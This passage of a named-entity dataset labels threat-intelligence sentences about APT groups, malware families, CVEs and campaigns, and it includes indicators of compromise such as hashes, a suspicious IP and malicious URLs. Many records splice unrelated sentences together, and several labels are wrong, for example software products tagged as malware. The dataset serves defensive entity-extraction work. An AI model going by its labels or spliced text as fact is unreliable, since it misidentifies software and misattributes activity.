[[5719, 5726]], "Organization: financially": [[5869, 5880]], "Malware: malware": [[5906, 5913], [9224, 9231]], "Organization: Bangladesh central bank": [[6115, 6138]], "Vulnerability: EternalBlue": [[6299, 6310]], "Vulnerability: exploit": [[6311, 6318], [12304, 12311], [12605, 12612]], "System: Windows": [[6358, 6365], [12637, 12644], [13554, 13561], [13648, 13655]], "Vulnerability: CVE-2017-0144": [[6366, 6379]], "Vulnerability: CVE-2017-0145": [[6384, 6397]], "Organization: financial sector": [[6891, 6907]], "Organization: FASTCash": [[7117, 7125]], "Malware: TeamViewer": [[7446, 7456]], "Indicator: AutoHotKey scripts": [[7630, 7648]], "Malware: archives": [[8073, 8081]], "Malware: decoy image": [[8149, 8160]], "Indicator: implant": [[8724, 8731]], "Organization: Ukrainian government": [[8915, 8935]], "Malware: desktop screenshots": [[8974, 8993]], "Malware: file stealing": [[8996, 9009]], "Malware: capturing audio recording": [[9021, 9046]], "Malware: information stealing tools": [[9300, 9326]], "Malware: malicious attachments": [[9498, 9519]], "Malware: SFX": [[9634, 9637]], "Indicator: Windows tools": [[9752, 9765]], "Indicator: sample": [[9792, 9798]], "Indicator: makeself script": [[9898, 9913]], "Indicator: ./setup.sh": [[9935, 9945]], "Indicator: ShooterAudio module": [[9968, 9987]], "Malware: PulseAudio": [[9993, 10003]], "Indicator: makeself.sh": [[10050, 10061]], "Indicator: shell script": [[10073, 10085]], "Organization: embassies": [[10645, 10654], [10919, 10928]], "Organization: government entities": [[10657, 10676]], "Organization: education": [[10679, 10688]], "Organization: media outlets": [[10691, 10704]], "Organization: activists": [[10721, 10730]], "Organization: personnel": [[10754, 10763]], "Organization: healthcare": [[10766, 10776]], "Organization: banking": [[10781, 10788]], "Organization: political personnel": [[10933, 10952]], "Organization: Palestinian": [[11128, 11139]], "Indicator: RAT": [[11283, 11286]], "Organization: complicated 
Palestinian situation": [[11586, 11619]], "Organization: Cylance": [[11622, 11629]], "Malware: Gh0st RAT": [[11714, 11723]], "Malware: zlib compression": [[11866, 11882]], "Indicator: Gh0st RAT": [[12071, 12080]], "Malware: Equation Group tools": [[12427, 12447], [12731, 12751], [13096, 13116]], "Organization: Symantec": [[12986, 12994], [13615, 13623]], "Malware: trove": [[13275, 13280]], "Malware: exploit tool": [[13443, 13455]], "Vulnerability: zero-day": [[13562, 13570]], "Vulnerability: vulnerabilities": [[13656, 13671]]}, "info": {"id": "cyberner_stix_valid_000359", "source": "cyberner_stix_valid"}} {"text": "Whitefly is a highly adept group with a large arsenal of tools at its disposal , capable of penetrating targeted organizations and maintaining a long-term presence on their networks . According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL .", "spans": {"Organization: FireEye": [[197, 204]], "Vulnerability: exploit": [[280, 287]], "Organization: Microsoft Office": [[288, 304]], "Vulnerability: vulnerabilities": [[305, 320]], "Malware: LOWBALL": [[371, 378]]}, "info": {"id": "cyberner_stix_valid_000360", "source": "cyberner_stix_valid"}} {"text": "Ensuring that applications and operating systems are patched with the latest updates greatly reduces the number of exploitable entry points available to an attacker .", "spans": {}, "info": {"id": "cyberner_stix_valid_000361", "source": "cyberner_stix_valid"}} {"text": "The group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries . 
The functionalities are similar to the malicious app provided , which includes installing tor and proxy .", "spans": {"Organization: financial": [[71, 80]], "Organization: government": [[83, 93]], "Organization: energy": [[96, 102]], "Organization: chemical": [[105, 113]], "Organization: telecommunications": [[116, 134]], "Malware: malicious app": [[197, 210]]}, "info": {"id": "cyberner_stix_valid_000362", "source": "cyberner_stix_valid"}} {"text": "On August 23 , 2017 , DHS published a Malware Analysis Report ( MAR-10132963 ) that examines malware functionality to provide detailed code analysis and insight into specific tactics , techniques , and procedures ( TTPs ) observed in the malware .", "spans": {"Organization: DHS": [[22, 25]]}, "info": {"id": "cyberner_stix_valid_000363", "source": "cyberner_stix_valid"}} {"text": "Pony is a fairly common malware family that has existed in various forms since 2012 , with our first indications of Nigerian use occurring in August 2014 . The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center .", "spans": {"Organization: employees": [[366, 375]]}, "info": {"id": "cyberner_stix_valid_000364", "source": "cyberner_stix_valid"}} {"text": "] commargaery [ . This documentation provides new insight into intrusion efforts conducted by at least four discrete Iranian threat actors , Rocket Kitten , Infy , Sima , and Operation Cleaver , including groups and tools that have not been previously disclosed . In the same way that people program named contacts into their cell phones and no longer need to remember phone numbers , DNS allows people to remember names like “ google.com ” instead of IP addresses . 
Tarrask is able to create \" hidden \" scheduled tasks by deleting the Security Descriptor ( SD ) registry value.[9 ] WarzoneRAT can masquerade the Process Environment Block on a compromised host to hide it 's attempts to elevate privileges through IFileOperation .", "spans": {"Indicator: google.com": [[428, 438]], "Malware: WarzoneRAT": [[583, 593]]}, "info": {"id": "cyberner_stix_valid_000365", "source": "cyberner_stix_valid"}} {"text": "The Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information . If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail , TG-3390 identify other externally accessible servers and deploy ChinaChopper web shells .", "spans": {"Organization: Tibetan community": [[4, 21]], "Malware: OwaAuth web shell": [[160, 177]]}, "info": {"id": "cyberner_stix_valid_000366", "source": "cyberner_stix_valid"}} {"text": "To retrieve IP addresses that have ARP entries , Ryuk calls GetIpNetTable . ScarCruft has several ongoing operations , utilizing multiple exploits — two for Adobe Flash and one for Microsoft Internet Explorer .", "spans": {"Malware: Adobe Flash": [[157, 168]], "Malware: Microsoft Internet Explorer": [[181, 208]]}, "info": {"id": "cyberner_stix_valid_000367", "source": "cyberner_stix_valid"}} {"text": "For instance , in the case of the “ Execute ” opcode ( 0x17 ) , the 32-bit code to run is stored entirely into the variable section with the value at offset 5 specifying the number of bytes to be copied and executed . Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called \" Rocket Kitten \" ( AKA Operation Saffron Rose , Ajax Security Team , Operation Woolen-Goldfish ) as well as an older attack campaign called Newscasters . 
Winnti : a260dcf193e747cee49ae83568eea6c04bf93cb3 https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php . DDoS and MiTM Attacks Any anomalous increase in traffic or redirect through unrecognized external servers can be an indication of a cyberattack that s about to happen .", "spans": {"Indicator: a260dcf193e747cee49ae83568eea6c04bf93cb3": [[514, 554]], "Indicator: https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php": [[555, 621]]}, "info": {"id": "cyberner_stix_valid_000368", "source": "cyberner_stix_valid"}} {"text": "Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . In 2017 , the same entities that were affected by the Okrum malware and by the 2015 Ketrican backdoors again became targets of the malicious actors .", "spans": {"Vulnerability: Java zero-day vulnerability": [[30, 57]], "Vulnerability: CVE-2012-4681": [[60, 73]], "Malware: Microsoft Word": [[119, 133]], "Vulnerability: CVE-2010-3333": [[136, 149]], "Vulnerability: CVE-2010-2883": [[175, 188]], "Indicator: Okrum malware": [[247, 260]], "Indicator: Ketrican backdoors": [[277, 295]]}, "info": {"id": "cyberner_stix_valid_000369", "source": "cyberner_stix_valid"}} {"text": "Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors . The Winnti umbrella and linked groups' initial targets are gaming studios and high tech businesses .", "spans": {"Vulnerability: CVE-2012-0158": [[40, 53]], "Malware: Winnti": [[88, 94]], "Organization: gaming studios": [[143, 157]], "Organization: high tech businesses": [[162, 182]]}, "info": {"id": "cyberner_stix_valid_000370", "source": "cyberner_stix_valid"}} {"text": "] com are or were intended for malicious use . According to our telemetry , the campaign spreading these tools has been live since 2016 , with the most recent detections as late as in July 2019 . 
Cybereason also attributes the recently reported Backdoor.Win32.Denis to the OceanLotus Group , which at the time of this report 's writing , had not been officially linked to this threat actor .", "spans": {"Organization: Cybereason": [[196, 206]], "Malware: Backdoor.Win32.Denis": [[245, 265]]}, "info": {"id": "cyberner_stix_valid_000371", "source": "cyberner_stix_valid"}} {"text": "First ( start ) module The first module , which was installed on the targeted device , could be controlled over the IRC protocol and enable deployment of other components by downloading a payload from the FTP server : @ install command As can be seen from the screenshot above , a new component was copied in the system path , though that sort of operation is impossible without root privileges . Based on our analysis of public and private information from submissions , along with product telemetry , it appears Proxysvc was used alongside the 2017 Destover variant and has operated undetected since mid-2017 . Elfin is one of the most active groups currently operating in the Middle East , targeting a large number of organizations across a diverse range of sectors . The malware is designed to cause electric power disruption by interacting with IEC 60870 - 5 - 104 ( IEC-104 ) devices , such as remote terminal units ( RTUs ) , that are commonly leveraged in electric transmission and distribution operations in Europe , the Middle East , and Asia .", "spans": {}, "info": {"id": "cyberner_stix_valid_000372", "source": "cyberner_stix_valid"}} {"text": "An example of the string which is sent to the command-and-control would be “ phone 26.03.2013 ” . Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can′t prove they were related to this particular attack . 
NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence .", "spans": {"Vulnerability: CVE-2017-11882": [[163, 177]], "Vulnerability: CVE-2016-4117": [[374, 387]], "Vulnerability: exploit": [[388, 395]]}, "info": {"id": "cyberner_stix_valid_000373", "source": "cyberner_stix_valid"}} {"text": "The function “ NvStart ” is similar to the main function of the older module ; it creates a window and enters the message loop waiting for device arrival notifications .", "spans": {}, "info": {"id": "cyberner_stix_valid_000374", "source": "cyberner_stix_valid"}} {"text": "The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . This malware , which specifically targets Swiss banking users , uses a phishing campaign to drop its payload , which eventually results in the hijacking of a user ’s network traffic using a Man-in-the-Middle ( MitM ) attack .", "spans": {"Malware: KopiLuwak": [[21, 30]], "Malware: malware": [[155, 162]]}, "info": {"id": "cyberner_stix_valid_000375", "source": "cyberner_stix_valid"}} {"text": "Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT16 launched several spear phishing attacks targeting Japan and Taiwan in the high-tech , government services , media and financial services industries . 
We will detail how the C&C infrastructure and tools used by hacker group Hidden Lynx during its VOHO campaign ( 2012 ) , excellently documented by Symantec researchers last September , overlap with tools used in other high profile operations during the past few years .", "spans": {"Organization: high-tech": [[165, 174]], "Organization: government services": [[177, 196]], "Organization: media": [[199, 204]], "Organization: financial services industries": [[209, 238]], "Organization: Symantec": [[388, 396]]}, "info": {"id": "cyberner_stix_valid_000376", "source": "cyberner_stix_valid"}} {"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions .", "spans": {"Organization: government officials": [[28, 48]], "Malware: malicious Microsoft Word document": [[90, 123]], "Vulnerability: CVE-2012-0158": [[143, 156]], "Organization: SOC personnel": [[237, 250]]}, "info": {"id": "cyberner_stix_valid_000377", "source": "cyberner_stix_valid"}} {"text": "What is Chrysaor ? Targeted regions included in the list of Leafminer are Saudi Arabia , United Arab Emirates , Qatar , Kuwait , Bahrain , Egypt , Israel , and Afghanistan . APT33 : 192.119.15.39 remote-server.ddns.net . 
Instead , it appeared that corresponding requests were made directly through the Outlook Web Application ( OWA ) endpoint , indicating a previously undisclosed exploit method for Exchange .", "spans": {"Malware: Chrysaor": [[8, 16]], "Indicator: 192.119.15.39": [[182, 195]], "Indicator: remote-server.ddns.net": [[196, 218]]}, "info": {"id": "cyberner_stix_valid_000378", "source": "cyberner_stix_valid"}} {"text": "Due to the current absence of maintained and supported Android banking Malware-as-a-Service in the underground community , there is a certainly demand for a new service . The SectorJ04 group has carried out large-scale hacking activities targeting South Korea , while also expanding the field of attacks to Southeast Asian countries such as Taiwan and the Philippines . The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": {"Malware: Android": [[55, 62]], "Malware: Daserf": [[462, 468]], "Malware: malware": [[469, 476]], "Vulnerability: exploits": [[508, 516]]}, "info": {"id": "cyberner_stix_valid_000379", "source": "cyberner_stix_valid"}} {"text": "Data collectors : dump all existing content on the device into a queue . This actor , whose espionage activities primarily focus on targets in the US and Western Europe with military ties , has been active since at least 2014 . Winnti : a045939f 2018-07-11 15:45:57 https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php . The file ’s name consists of six randomly - generated alphanumeric characters .", "spans": {"Organization: military": [[174, 182]], "Indicator: https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php": [[266, 329]]}, "info": {"id": "cyberner_stix_valid_000380", "source": "cyberner_stix_valid"}} {"text": "It does so using the Services , Broadcast Receivers , and Activities components of the Android platform . 
From 16 October 2018 to 1 January 2019 , Silence sent out about 84 , 000 emails in Russia alone to update their address database . Flying Kitten ( which is another name given by the security industry to Charming Kitten ) was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of the IRI ( Islamic Republic of Iran ) government and foreign espionage targets .", "spans": {"System: Android": [[87, 94]], "Organization: security industry": [[288, 305]]}, "info": {"id": "cyberner_stix_valid_000381", "source": "cyberner_stix_valid"}} {"text": "Beginning in mid-January 2019 , TA542 distributed millions of Emotet-laden emails in both English and German . Active since 2012 , it has so far targeted Taiwanese government agencies and private organizations .", "spans": {"Organization: government agencies": [[164, 183]]}, "info": {"id": "cyberner_stix_valid_000382", "source": "cyberner_stix_valid"}} {"text": "It ’ s even possible to send log messages via SMS to the attacker ’ s number . Malefactors used watering hole attacks to compromise legitimate and trusted websites frequently visited by their targets . APT33 : 87e2cf4aa266212aa8cf1b1c98ae905c7bac40a6fc21b8e821ffe88cf9234586 S-SHA2 LaZagne . We found roughly 500 domain names that lead or have led to the “ Pig network ” between 2015 to March 2017 .", "spans": {"Malware: 87e2cf4aa266212aa8cf1b1c98ae905c7bac40a6fc21b8e821ffe88cf9234586 S-SHA2 LaZagne": [[210, 289]]}, "info": {"id": "cyberner_stix_valid_000383", "source": "cyberner_stix_valid"}} {"text": "Our visibility into the operations of APT28 - a group we believe the Russian Government sponsors - has given us insight into some of the government ’s targets , as well as its objectives and the activities designed to further them .", "spans": {}, "info": {"id": "cyberner_stix_valid_000384", "source": "cyberner_stix_valid"}} {"text": "Infrastructure The infrastructure supporting this malware is rather complex . 
In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign . If the module that loads the sample is named myapp.exe the module will exit Once loaded , it sleeps for six seconds . The adversary may drop or create malware , tools , or other non - native files on a target system to accomplish this , potentially leaving behind traces of malicious activities .", "spans": {"Organization: Trend Micro": [[92, 103]], "Malware: W2KM_DLOADR.UHAOEEN": [[137, 156]], "Indicator: myapp.exe": [[243, 252]]}, "info": {"id": "cyberner_stix_valid_000385", "source": "cyberner_stix_valid"}} {"text": "] ponethus [ . There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements – developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information . Cybercriminals are constantly evolving and adapting in their attempts to bypass computer network defenses . The decoy installer ( Install%20Updater%20(V104.25.151)-stable.url ) is an Internet shortcut downloaded from another compromised WordPress site .", "spans": {"Malware: exploit code": [[28, 40]], "System: WordPress site": [[550, 564]]}, "info": {"id": "cyberner_stix_valid_000386", "source": "cyberner_stix_valid"}} {"text": "Such app stores are so-called because they are not officially supported by Android , nor are they provided by Google , unlike the Play Store . Turla is a complex cyberattack platform focused predominantly on diplomatic and government-related targets , particularly in the Middle East , Central and Far East Asia , Europe , North and South America and former Soviet bloc nations . 
APT1 has used and steadily modified BISCUIT since as early as 2007 and continues to use it presently .", "spans": {"System: Android": [[75, 82]], "Organization: Google": [[110, 116]], "System: Play Store": [[130, 140]], "Malware: BISCUIT": [[416, 423]]}, "info": {"id": "cyberner_stix_valid_000387", "source": "cyberner_stix_valid"}} {"text": "Once the actor had successfully established access to the network , a simple network scan to look for other insecure devices allowed them to discover and move across the network in search of higher-privileged accounts that would grant access to higher-value data .", "spans": {}, "info": {"id": "cyberner_stix_valid_000388", "source": "cyberner_stix_valid"}} {"text": "ZeroT remained the primary stage 1 payload , but the stage 2 payloads varied .", "spans": {"Malware: ZeroT": [[0, 5]]}, "info": {"id": "cyberner_stix_valid_000389", "source": "cyberner_stix_valid"}} {"text": "The only other publicly used name for the threat actor that we are aware of is “ APT29 ” .", "spans": {}, "info": {"id": "cyberner_stix_valid_000390", "source": "cyberner_stix_valid"}} {"text": "While all of the earlier toolsets – GeminiDuke , PinchDuke , and CosmicDuke – were designed around a core infostealer component , MiniDuke is centered on a simplistic backdoor component whose purpose is to enable the remote execution of commands on the compromised system .", "spans": {"Malware: GeminiDuke": [[36, 46]], "Malware: PinchDuke": [[49, 58]], "Malware: CosmicDuke": [[65, 75]], "Malware: MiniDuke": [[130, 138]]}, "info": {"id": "cyberner_stix_valid_000391", "source": "cyberner_stix_valid"}} {"text": "Cannon uses SMTPS and POP3S as its C2 channel compared to Zebrocy that uses a more commonly observed HTTP or HTTPS based C2 .", "spans": {"Malware: Cannon": [[0, 6]], "Malware: Zebrocy": [[58, 65]]}, "info": {"id": "cyberner_stix_valid_000392", "source": "cyberner_stix_valid"}} {"text": "Samples uploaded to VirusTotal To encourage further research in the security 
community , we ’ ve uploaded these sample Chrysaor apps to Virus Total . FireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40 . Winnti : xigncodeservice.com 2018-07-10 09:18:17 https://namu.wiki/w/XIGNCODE . If the main function is called with only , it will take the path that is intended for connect to the MSSQL server and , upload • None are supplied to the main function , it will immediately fail due to attempting to utilize command line arguments that were not parsed yet .", "spans": {"Organization: VirusTotal": [[20, 30]], "Malware: Chrysaor": [[119, 127]], "Organization: Virus Total": [[136, 147]], "Organization: FireEye": [[150, 157]], "Indicator: xigncodeservice.com": [[336, 355]], "Indicator: https://namu.wiki/w/XIGNCODE": [[376, 404]]}, "info": {"id": "cyberner_stix_valid_000393", "source": "cyberner_stix_valid"}} {"text": "Otherwise , it will launch an ACTION_APPLICATION_SETTINGS intent trying to trick the user to grant the permissions . Both the Trochilus and MoonWind RATs were hosted on the same compromised sites and used to target the same organization at the same time . The same “ Tran Duy Linh ” Microsoft Word Exploit Kit was used in delivery of this backdoor . Enterprise T1078 Valid Accounts APT29 has used a compromised account to access an organization 's VPN infrastructure .", "spans": {"Organization: Microsoft": [[283, 292]], "System: organization 's VPN infrastructure": [[432, 466]]}, "info": {"id": "cyberner_stix_valid_000394", "source": "cyberner_stix_valid"}} {"text": "Their software , once surreptitiously installed on a target 's cell phone or computer , can be used to monitor the target 's communications , such as phone calls , text messages , Skype calls , or emails . 
After publishing our initial series of blogposts back in 2016 , we have continued to track the ScarCruft threat actor .", "spans": {}, "info": {"id": "cyberner_stix_valid_000395", "source": "cyberner_stix_valid"}} {"text": "If the text is retrieved successfully , the app uses JavaScript injection again to submit the HTML form with the captcha answer . The China-backed BARIUM APT is suspected to be at the helm of the project . The code then tries to kill each process and service that belongs to the following list of AV products : Symantec B-TOOL S-IDTY Firewall Norton ESET McAfee Avast Avira Sophos Malwarebytes . The name of the shortcut file , depending on the campaign , is either randomly generated by a random string generator function or hardcoded in the macro code .", "spans": {}, "info": {"id": "cyberner_stix_valid_000396", "source": "cyberner_stix_valid"}} {"text": "The evidence above suggests that EventBot is still in the development stage , and as such , is not likely to have been used for large attack campaigns thus far . Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . As described in previous publications , the Rocket Kitten attackers make extensive use of various phishing schemes .", "spans": {"Malware: EventBot": [[33, 41]], "Malware: TajMahal": [[199, 207]]}, "info": {"id": "cyberner_stix_valid_000397", "source": "cyberner_stix_valid"}} {"text": "The first part of the campaign From Jan. 23 , 2018 , to Feb. 26 , 2018 used a macro-based document that dropped a VBS file and an INI file . 
The samples we identified target the ATM vendor Diebold .", "spans": {"Malware: VBS file": [[114, 122]], "Malware: INI file": [[130, 138]], "Indicator: samples": [[145, 152]], "Organization: ATM vendor Diebold": [[178, 196]]}, "info": {"id": "cyberner_stix_valid_000398", "source": "cyberner_stix_valid"}} {"text": "In addition , these out-of-the-box hosting services usually provide better infrastructure than the attackers could manage to construct ( or compromise ) themselves . Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system . Before reversing the executable , it is possible to clean it allowing the size reduction and the junk instruction reduction inside the code . Researchers have linked the group with low confidence to APT33 and APT34 .", "spans": {"Malware: Clayslide delivery documents": [[245, 273]]}, "info": {"id": "cyberner_stix_valid_000399", "source": "cyberner_stix_valid"}} {"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . According to ESET telemetry , Okrum was first detected in December 2016 , and targeted diplomatic missions in Slovakia , Belgium , Chile , Guatemala and Brazil throughout 2017 .", "spans": {"Malware: documents": [[12, 21]], "Vulnerability: CVE-2017-0199": [[32, 45]], "Organization: ESET": [[84, 88]], "Indicator: Okrum": [[101, 106]]}, "info": {"id": "cyberner_stix_valid_000400", "source": "cyberner_stix_valid"}} {"text": "Check Point reached out to the Google Security team immediately with information on this campaign . In early 2014 , the APT38 deployed NESTEGG ( a backdoor ) and KEYLIME ( a keylogger ) malware designed to impact financial institution-specific systems at a Southeast Asian bank . 
Before continuing , Several issues in Foxit PDF reader could lead to arbitrary code execution Foxit PDF Reader is one of the most popular PDF readers on the market , offering many similar features to Adobe Acrobat .", "spans": {"Organization: Check Point": [[0, 11]], "Organization: Google Security": [[31, 46]], "Organization: bank": [[273, 277]], "Organization: Adobe Acrobat": [[480, 493]]}, "info": {"id": "cyberner_stix_valid_000401", "source": "cyberner_stix_valid"}} {"text": "This was probably done for debugging purposes , indicating the malware may be an early prototype version . The document attached to this e-mail exploits CVE-2012-0158 . In the past , BlackOasis messages were designed to appear like news articles from 2016 about political relations between Angola and China .", "spans": {"Vulnerability: e-mail exploits": [[137, 152]], "Vulnerability: CVE-2012-0158": [[153, 166]], "Organization: political": [[262, 271]]}, "info": {"id": "cyberner_stix_valid_000402", "source": "cyberner_stix_valid"}} {"text": "It is capable of a variety of functions , including credential theft , hard drive and data wiping , disabling security software , and remote desktop functionality . In addition to these , the Animal Farm attackers used at least one unknown , mysterious malware during an operation targeting computer users in Burkina Faso .", "spans": {"Organization: users": [[300, 305]]}, "info": {"id": "cyberner_stix_valid_000403", "source": "cyberner_stix_valid"}} {"text": "WICKED SPIDER has been observed targeting technology companies in Germany , Indonesia , the Russian Federation , South Korea , Sweden , Thailand , Turkey , the United States , and elsewhere . 
The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": {"Organization: technology companies": [[42, 62]], "Vulnerability: exploits": [[251, 259]], "Malware: Carberp": [[277, 284]], "Malware: JHUHUGIT downloaders": [[291, 311]]}, "info": {"id": "cyberner_stix_valid_000404", "source": "cyberner_stix_valid"}} {"text": "The following is a review of scope and impact of the Chrysaor app named com.network.android tailored for a Samsung device target , with SHA256 digest : ade8bef0ac29fa363fc9afd958af0074478aef650adeb0318517b48bd996d5d5Upon installation , the app uses known framaroot exploits to escalate privileges and break Android 's application sandbox . Between August 2 and 4 , the Leviathan sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors . A string identifying a campaign . Systems are compromised to enable them to then attack other systems .", "spans": {"Malware: Chrysaor": [[53, 61]], "Organization: Samsung": [[107, 114]], "System: Android": [[307, 314]], "Organization: defense contractors": [[473, 492]]}, "info": {"id": "cyberner_stix_valid_000405", "source": "cyberner_stix_valid"}} {"text": "Write a new file “ %LOCAL_APPDATA%\\dllhost.exe ” or “ %TEMP%\\dllhost.exe ” and execute it , then delete the file , Write a new file “ %LOCAL_APPDATA%\\sechost.dll ” or “ %TEMP%\\sechost.dll ” and call its first exported function using “ rundll32.exe ” or Windows API , then delete the file , Run shellcode provided by the server in a new thread While processing the commands , the backdoor logs all errors and execution results .", "spans": {"Indicator: %LOCAL_APPDATA%\\dllhost.exe": [[19, 46]], "Indicator: %TEMP%\\dllhost.exe": [[54, 72]], "Indicator: %LOCAL_APPDATA%\\sechost.dll": [[134, 161]], "Indicator: %TEMP%\\sechost.dll": [[169, 187]], "Indicator: rundll32.exe": [[235, 247]], "System: Windows": [[253, 
260]]}, "info": {"id": "cyberner_stix_valid_000406", "source": "cyberner_stix_valid"}} {"text": "However , over the last nine campaigns since Trend Micro‘s June report , TA505 also started using .ISO image attachments as the point of entry , as well as a .NET downloader , a new style for macro delivery , a newer version of ServHelper , and a .DLL variant of FlawedAmmyy downloader . Lotus Blossom attempted to exploit CVE-2014-6332 using the POC code available in the wild .", "spans": {"Organization: Trend Micro‘s": [[45, 58]], "Malware: .DLL variant": [[247, 259]], "Vulnerability: exploit": [[315, 322]], "Vulnerability: CVE-2014-6332": [[323, 336]]}, "info": {"id": "cyberner_stix_valid_000407", "source": "cyberner_stix_valid"}} {"text": "The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China .", "spans": {}, "info": {"id": "cyberner_stix_valid_000408", "source": "cyberner_stix_valid"}} {"text": "Backdoor.SH.SHELLBOT.AA : b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d .", "spans": {"Malware: Backdoor.SH.SHELLBOT.AA": [[0, 23]], "Indicator: b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d": [[26, 90]]}, "info": {"id": "cyberner_stix_valid_000409", "source": "cyberner_stix_valid"}} {"text": "The Zebrocy tool associated with this current strain of attacks is constructed in several different forms based on the programming language the developer chose to create the tool .", "spans": {"Malware: Zebrocy": [[4, 11]]}, "info": {"id": "cyberner_stix_valid_000410", "source": "cyberner_stix_valid"}} {"text": "However , the underlying code can be quite different in that various obfuscation mechanisms were adopted to evade detection by anti-virus tools . Iranian threat agent OilRig has been targeting multiple organisations in Israel and other countries in the Middle East since the end of 2015 . 
The first check performed is on the arguments : if the arguments length is equal to zero , the malware terminates the execution . Cl0p 's precipitous rise to the top of the charts this month , on the other hand , can be explained by their exploitation of a zero - day in MOVEit Transfer , a widely used file transfer software .", "spans": {"Vulnerability: zero - day": [[545, 555]]}, "info": {"id": "cyberner_stix_valid_000411", "source": "cyberner_stix_valid"}} {"text": "All contain the same Visual Basic macro code and author name as Honeybee . Based on recent reports , the country has been plagued by attacks using the Ursnif and Urlzone banking malware .", "spans": {"Indicator: Ursnif": [[151, 157]], "Indicator: Urlzone": [[162, 169]]}, "info": {"id": "cyberner_stix_valid_000412", "source": "cyberner_stix_valid"}} {"text": "CNIIHM officially collaborates with other national technology and development organizations , including :", "spans": {"Organization: CNIIHM": [[0, 6]]}, "info": {"id": "cyberner_stix_valid_000413", "source": "cyberner_stix_valid"}} {"text": "Either method to load HenBox ultimately results in an instance of a service being launched . In March 2017 , suspected Chinese espionage operators targeted CCleaner , a utility that assists in the removal of unwanted files from a computer . 
Their evolving and modified SPLM , CHOPSTICK , XAgent code is a long-standing part of Sofacy activity , however much of it is changing .", "spans": {"Malware: HenBox": [[22, 28]], "Malware: SPLM": [[269, 273]], "Malware: CHOPSTICK": [[276, 285]], "Malware: XAgent": [[288, 294]]}, "info": {"id": "cyberner_stix_valid_000414", "source": "cyberner_stix_valid"}} {"text": "When the attacker restarts the Quasar application , our uploaded “ dnsapi.dll ” will instead be loaded .", "spans": {"Malware: Quasar": [[31, 37]], "Indicator: dnsapi.dll": [[67, 77]]}, "info": {"id": "cyberner_stix_valid_000415", "source": "cyberner_stix_valid"}} {"text": "EventBot is in constant development , as seen with the botnetID string above , which shows consecutive numbering across versions . It is likely a new campaign or actor started using Panda Banker since in addition to the previously unseen Japanese targeting , Arbor has not seen any indicator of compromise (IOC) overlaps with previous Panda Banker campaigns . Since early 2014 , an attacker group of Iranian origin has been actively targeting persons of interest by means of malware infection , supported by persistent spear phishing campaigns .", "spans": {"Malware: EventBot": [[0, 8]], "Organization: Arbor": [[259, 264]], "Malware: Panda Banker": [[335, 347]]}, "info": {"id": "cyberner_stix_valid_000416", "source": "cyberner_stix_valid"}} {"text": "Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . 
